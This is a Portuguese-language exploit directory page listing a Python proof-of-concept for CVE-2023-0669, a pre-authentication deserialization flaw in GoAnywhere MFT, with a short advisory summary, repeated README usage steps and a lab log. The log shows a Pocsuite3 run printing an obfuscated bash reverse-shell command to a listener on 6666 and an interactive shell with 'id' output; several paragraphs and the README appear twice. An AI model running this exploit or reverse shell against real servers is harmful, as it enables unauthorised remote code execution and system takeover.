Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-0669 — GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Vulnerabilidades de Desserialização Python RCE PoC (Prova de Conceito) | Kitploit
Ferramentas/GitHubGitHub/avento/cve-2023-0669
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubavento/cve-2023-0669

CVE-2023-0669

GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Vulnerabilidades de Desserialização Python RCE PoC (Prova de Conceito)

Ver Repositório
83há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-0669 GoAnywhere MFT Desserialização - Blog do Je Yiuwai

CVE-2023-0669

CVE-2023-0669 é uma vulnerabilidade de desserialização do GoAnywhere MFT que existe no License Response Servlet devido a uma vulnerabilidade de injeção de comandos pré-autenticada, causada pela desserialização de um objeto controlado por um atacante arbitrário. Um atacante pode explorar essa vulnerabilidade para executar código arbitrário no sistema afetado, levando ao controle total do sistema. A vulnerabilidade afeta versões anteriores a 7.1.2, exclusive.

CVE-2023-0669 é uma vulnerabilidade de desserialização do GoAnywhere MFT que existe no License Response Servlet devido a uma vulnerabilidade de injeção de comandos pré-autenticada que permite a um atacante executar código arbitrário no sistema afetado ao desserializar um objeto controlado pelo atacante. A vulnerabilidade afeta versões anteriores à 7.1.2.

Esta vulnerabilidade pode representar uma séria ameaça à segurança do software de transferência de arquivos corporativo GoAnywhere MFT. Os atacantes podem explorar essa vulnerabilidade para roubar dados sensíveis, adulterar dados, comprometer sistemas, etc. Portanto, os usuários precisam tomar medidas prontamente para proteger a segurança do sistema.

A vulnerabilidade representa uma séria ameaça à segurança do software de transferência de arquivos corporativo GoAnywhere MFT, pois os atacantes podem explorá-la para roubar dados sensíveis, adulterar dados e comprometer sistemas. Portanto, os usuários precisam tomar medidas prontamente para proteger seus sistemas.

O anúncio oficial de segurança foi divulgado e métodos preliminares de verificação foram fornecidos. Os usuários podem verificar se há strings específicas nos logs userdata/logs para determinar se o sistema é afetado por essa vulnerabilidade. Se não for possível aplicar patches, recomenda-se tomar outras medidas de segurança para proteger o sistema.

O comunicado oficial de segurança foi divulgado e métodos preliminares de inspeção foram fornecidos. Os usuários podem verificar se seus sistemas são afetados pela vulnerabilidade procurando por strings específicas no log userdata/logs. Se não for possível aplicar patches, recomenda-se tomar outras medidas de segurança para proteger o sistema.

Resumindo, CVE-2023-0669 é uma vulnerabilidade de desserialização que requer atenção dos usuários. Os usuários precisam atualizar para a versão mais recente prontamente e verificar se seus sistemas são afetados pela vulnerabilidade. Ao mesmo tempo, recomenda-se que os usuários reforcem o gerenciamento de segurança de softwares corporativos como o GoAnywhere MFT e adotem medidas de segurança em várias camadas para proteger a segurança do sistema.

Em resumo, CVE-2023-0669 é uma vulnerabilidade de desserialização que requer a atenção dos usuários. Os usuários precisam atualizar para a versão mais recente prontamente e verificar se seus sistemas são afetados pela vulnerabilidade. Além disso, recomenda-se que os usuários reforcem o gerenciamento de segurança de softwares corporativos como o GoAnywhere MFT e adotem medidas de segurança em várias camadas para proteger seus sistemas.

CVE-2023-0669 PoC

Introdução

Este Exploit é um script baseado em Python usado para explorar a vulnerabilidade CVE-2023-0669 em GoAnywhere MFT v6.7.9594 e versões anteriores.

Descrição da Vulnerabilidade

Esta vulnerabilidade existe devido a um problema de segurança no processamento de requisições Bundle criptografadas no GoAnywhere MFT. Um atacante pode enviar uma requisição especialmente criada e executar código arbitrário no servidor alvo.

Modo de Uso

  1. Clone este repositório
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Entre no diretório CVE-2023-0669
root@kitploit:~
cd CVE-2023-0669
  1. Instale as bibliotecas de dependência requests e cryptography
root@kitploit:~
pip install requests cryptography
  1. Execute o Exploit
root@kitploit:~
python CVE-2023-0669.py --host <目标服务器IP>

Observações

  • Executar este Exploit requer direitos de acesso legais e não deve ser usado para fins ilegais.
  • Como a execução deste Exploit representa um risco para o servidor alvo, o usuário é o único responsável por seus riscos e consequências.

Introdução

Este Exploit é um script Python usado para explorar a vulnerabilidade CVE-2023-0669 no GoAnywhere MFT v6.7.9594 e versões anteriores.

Descrição da Vulnerabilidade

Esta vulnerabilidade existe devido a um problema de segurança no processamento de requisições Bundle criptografadas no GoAnywhere MFT. Um atacante pode enviar uma requisição especialmente criada para executar código arbitrário no servidor alvo.

Uso

  1. Clone este repositório.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Entre no diretório.
root@kitploit:~
cd CVE-2023-0669
  1. Instale as dependências de requests e cryptography.
root@kitploit:~
pip install requests cryptography
  1. Execute o Exploit.
root@kitploit:~
python CVE-2023-0669.py --host <target IP>

Nota

  • Executar este Exploit requer direitos de acesso legais e não deve ser usado para fins ilegais.
  • Como a execução deste Exploit representa um risco para o servidor alvo, o usuário é o único responsável por seus riscos e consequências.

RCE

root@kitploit:~
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3

root@kitploit:~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

Autor:Je Yiuwai editado por xiaomi pad 6 pro

Baixar ferramenta